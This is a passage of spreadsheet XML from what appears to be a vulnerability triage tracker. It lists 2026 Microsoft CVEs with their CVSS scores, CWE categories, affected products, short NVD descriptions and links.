      <c r="S1115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69739</t>
        </is>
      </c>
    </row>
    <row r="1116">
      <c r="A1116" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1116" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69744</t>
        </is>
      </c>
      <c r="D1116" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1116" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1116" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1116" s="5" t="inlineStr"/>
      <c r="H1116" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I1116" s="5" t="inlineStr"/>
      <c r="J1116" s="5" t="inlineStr"/>
      <c r="K1116" s="5" t="inlineStr"/>
      <c r="L1116" s="5" t="inlineStr"/>
      <c r="M1116" s="5" t="inlineStr"/>
      <c r="N1116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1116" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1116" s="5" t="inlineStr"/>
      <c r="Q1116" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R1116" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows Kerberos allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S1116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69744</t>
        </is>
      </c>
    </row>
    <row r="1117">
      <c r="A1117" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1117" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69760</t>
        </is>
      </c>
      <c r="D1117" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1117" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1117" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1117" s="5" t="inlineStr"/>
      <c r="H1117" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I1117" s="5" t="inlineStr"/>
      <c r="J1117" s="5" t="inlineStr"/>
      <c r="K1117" s="5" t="inlineStr"/>
      <c r="L1117" s="5" t="inlineStr"/>
      <c r="M1117" s="5" t="inlineStr"/>
      <c r="N1117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1117" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1117" s="5" t="inlineStr"/>
      <c r="Q1117" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1117" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Kerberos allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S1117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69760</t>
        </is>
      </c>
    </row>
    <row r="1118">
      <c r="A1118" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1118" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69793</t>
        </is>
      </c>
      <c r="D1118" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1118" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1118" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1118" s="5" t="inlineStr"/>
      <c r="H1118" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I1118" s="5" t="inlineStr"/>
      <c r="J1118" s="5" t="inlineStr"/>
      <c r="K1118" s="5" t="inlineStr"/>
      <c r="L1118" s="5" t="inlineStr"/>
      <c r="M1118" s="5" t="inlineStr"/>
      <c r="N1118" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1118" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1118" s="5" t="inlineStr"/>
      <c r="Q1118" s="5" t="inlineStr">
        <is>
          <t>CWE-1288</t>
        </is>
      </c>
      <c r="R1118" s="5" t="inlineStr">
        <is>
          <t>Improper validation of consistency within input in Windows TCP/IP allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="S1118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69793</t>
        </is>
      </c>
    </row>
    <row r="1119">
      <c r="A1119" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1119" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69803</t>
        </is>
      </c>
      <c r="D1119" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1119" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1119" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1119" s="5" t="inlineStr"/>
      <c r="H1119" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I1119" s="5" t="inlineStr"/>
      <c r="J1119" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1119" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1119" s="5" t="inlineStr"/>
      <c r="M1119" s="5" t="inlineStr"/>
      <c r="N1119" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1119" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1119" s="5" t="inlineStr"/>
      <c r="Q1119" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1119" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S1119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69803</t>
        </is>
      </c>
    </row>
    <row r="1120">
      <c r="A1120" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1120" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69804</t>
        </is>
      </c>
      <c r="D1120" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1120" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1120" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1120" s="5" t="inlineStr"/>
      <c r="H1120" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1120" s="5" t="inlineStr"/>
      <c r="J1120" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K1120" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L1120" s="5" t="inlineStr"/>
      <c r="M1120" s="5" t="inlineStr"/>
      <c r="N1120" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1120" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1120" s="5" t="inlineStr"/>
      <c r="Q1120" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="R1120" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="S1120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69804</t>
        </is>
      </c>
    </row>
    <row r="1121">
      <c r="A1121" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1121" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69805</t>
        </is>
      </c>
      <c r="D1121" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1121" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1121" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1121" s="5" t="inlineStr"/>
      <c r="H1121" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1121" s="5" t="inlineStr"/>
      <c r="J1121" s="5" t="inlineStr"/>
      <c r="K1121" s="5" t="inlineStr"/>
      <c r="L1121" s="5" t="inlineStr"/>
      <c r="M1121" s="5" t="inlineStr"/>
      <c r="N1121" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1121" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1121" s="5" t="inlineStr"/>
      <c r="Q1121" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-522, CWE-73</t>
        </is>
      </c>
      <c r="R1121" s="5" t="inlineStr">
        <is>
          <t>External control of file name or path in .NET allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S1121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69805</t>
        </is>
      </c>
    </row>
    <row r="1122">
      <c r="A1122" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1122" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69809</t>
        </is>
      </c>
      <c r="D1122" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1122" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1122" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1122" s="5" t="inlineStr"/>
      <c r="H1122" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I1122" s="5" t="inlineStr"/>
      <c r="J1122" s="5" t="inlineStr"/>
      <c r="K1122" s="5" t="inlineStr"/>
      <c r="L1122" s="5" t="inlineStr"/>
      <c r="M1122" s="5" t="inlineStr"/>
      <c r="N1122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1122" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1122" s="5" t="inlineStr"/>
      <c r="Q1122" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="R1122" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime in Active Directory Domain Services allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S1122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69809</t>
        </is>
      </c>
    </row>
    <row r="1123">
      <c r="A1123" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1123" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69852</t>
        </is>
      </c>
      <c r="D1123" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1123" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1123" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1123" s="5" t="inlineStr"/>
      <c r="H1123" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I1123" s="5" t="inlineStr"/>
      <c r="J1123" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K11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23" s="5" t="inlineStr"/>
      <c r="M1123" s="5" t="inlineStr"/>
      <c r="N1123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1123" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1123" s="5" t="inlineStr"/>
      <c r="Q1123" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1123" s="5" t="inlineStr">
        <is>
          <t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t>
        </is>
      </c>
      <c r="S1123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69852</t>
        </is>
      </c>
    </row>
    <row r="1124">
      <c r="A1124" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1124" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69881</t>
        </is>
      </c>
      <c r="D1124" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1124" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1124" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1124" s="5" t="inlineStr"/>
      <c r="H1124" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I1124" s="5" t="inlineStr"/>
      <c r="J1124" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K112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124" s="5" t="inlineStr"/>
      <c r="M1124" s="5" t="inlineStr"/>
      <c r="N1124" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1124" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1124" s="5" t="inlineStr"/>
      <c r="Q1124" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R1124" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows IKE Extension allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S1124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69881</t>
        </is>
      </c>
    </row>
    <row r="1125">
      <c r="A1125" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1125" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69890</t>
        </is>
      </c>
      <c r="D1125" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1125" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1125" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1125" s="5" t="inlineStr"/>
      <c r="H1125" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1125" s="5" t="inlineStr"/>
      <c r="J1125" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K112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125" s="5" t="inlineStr"/>
      <c r="M1125" s="5" t="inlineStr"/>
      <c r="N1125" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1125" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1125" s="5" t="inlineStr"/>
      <c r="Q1125" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1125" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Virtual Trusted Platform Module allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69890</t>
        </is>
      </c>
    </row>
    <row r="1126">
      <c r="A1126" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1126" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69929</t>
        </is>
      </c>
      <c r="D1126" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1126" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1126" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1126" s="5" t="inlineStr"/>
      <c r="H1126" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I1126" s="5" t="inlineStr"/>
      <c r="J1126" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1126" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1126" s="5" t="inlineStr"/>
      <c r="M1126" s="5" t="inlineStr"/>
      <c r="N1126" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1126" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1126" s="5" t="inlineStr"/>
      <c r="Q1126" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1126" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S1126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69929</t>
        </is>
      </c>
    </row>
    <row r="1127">
      <c r="A1127" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1127" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69930</t>
        </is>
      </c>
      <c r="D1127" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1127" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1127" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1127" s="5" t="inlineStr"/>
      <c r="H1127" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I1127" s="5" t="inlineStr"/>
      <c r="J1127" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1127" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1127" s="5" t="inlineStr"/>
      <c r="M1127" s="5" t="inlineStr"/>
      <c r="N1127" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1127" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1127" s="5" t="inlineStr"/>
      <c r="Q1127" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1127" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S1127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69930</t>
        </is>
      </c>
    </row>
    <row r="1128">
      <c r="A1128" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1128" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70065</t>
        </is>
      </c>
      <c r="D1128" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1128" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1128" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1128" s="5" t="inlineStr"/>
      <c r="H1128" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I1128" s="5" t="inlineStr"/>
      <c r="J1128" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1128" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1128" s="5" t="inlineStr"/>
      <c r="M1128" s="5" t="inlineStr"/>
      <c r="N1128" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1128" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1128" s="5" t="inlineStr"/>
      <c r="Q1128" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="R1128" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S1128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70065</t>
        </is>
      </c>
    </row>
    <row r="1129">
      <c r="A1129" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1129" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70124</t>
        </is>
      </c>
      <c r="D1129" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1129" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1129" s="5" t="inlineStr"/>
      <c r="H1129" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I1129" s="5" t="inlineStr"/>
      <c r="J1129" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1129" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1129" s="5" t="inlineStr"/>
      <c r="M1129" s="5" t="inlineStr"/>
      <c r="N1129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1129" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1129" s="5" t="inlineStr"/>
      <c r="Q1129" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1129" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S1129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70124</t>
        </is>
      </c>
    </row>
    <row r="1130">
      <c r="A1130" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1130" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70570</t>
        </is>
      </c>
      <c r="D1130" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1130" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1130" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1130" s="5" t="inlineStr"/>
      <c r="H1130" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1130" s="5" t="inlineStr"/>
      <c r="J1130" s="5" t="inlineStr"/>
      <c r="K1130" s="5" t="inlineStr"/>
      <c r="L1130" s="5" t="inlineStr"/>
      <c r="M1130" s="5" t="inlineStr"/>
      <c r="N1130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1130" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1130" s="5" t="inlineStr"/>
      <c r="Q1130" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1130" s="5" t="inlineStr">
        <is>
          <t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t>
        </is>
      </c>
      <c r="S1130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70570</t>
        </is>
      </c>
    </row>
    <row r="1131">
      <c r="A1131" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1131" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70579</t>
        </is>
      </c>
      <c r="D1131" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1131" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1131" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1131" s="5" t="inlineStr"/>
      <c r="H1131" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I1131" s="5" t="inlineStr"/>
      <c r="J1131" s="5" t="inlineStr"/>
      <c r="K1131" s="5" t="inlineStr"/>
      <c r="L1131" s="5" t="inlineStr"/>
      <c r="M1131" s="5" t="inlineStr"/>
      <c r="N1131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1131" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1131" s="5" t="inlineStr"/>
      <c r="Q1131" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1131" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Mobile Broadband allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S1131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70579</t>
        </is>
      </c>
    </row>
    <row r="1132">
      <c r="A1132" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1132" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70587</t>
        </is>
      </c>
      <c r="D1132" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1132" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1132" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1132" s="5" t="inlineStr"/>
      <c r="H1132" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I1132" s="5" t="inlineStr"/>
      <c r="J1132" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K11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32" s="5" t="inlineStr"/>
      <c r="M1132" s="5" t="inlineStr"/>
      <c r="N1132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1132" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1132" s="5" t="inlineStr"/>
      <c r="Q1132" s="5" t="inlineStr">
        <is>
          <t>CWE-170</t>
        </is>
      </c>
      <c r="R1132" s="5" t="inlineStr">
        <is>
          <t>Improper null termination in Windows Remote Desktop Protocol allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S1132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70587</t>
        </is>
      </c>
    </row>
    <row r="1133">
      <c r="A1133" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1133" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71330</t>
        </is>
      </c>
      <c r="D1133" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1133" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1133" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1133" s="5" t="inlineStr"/>
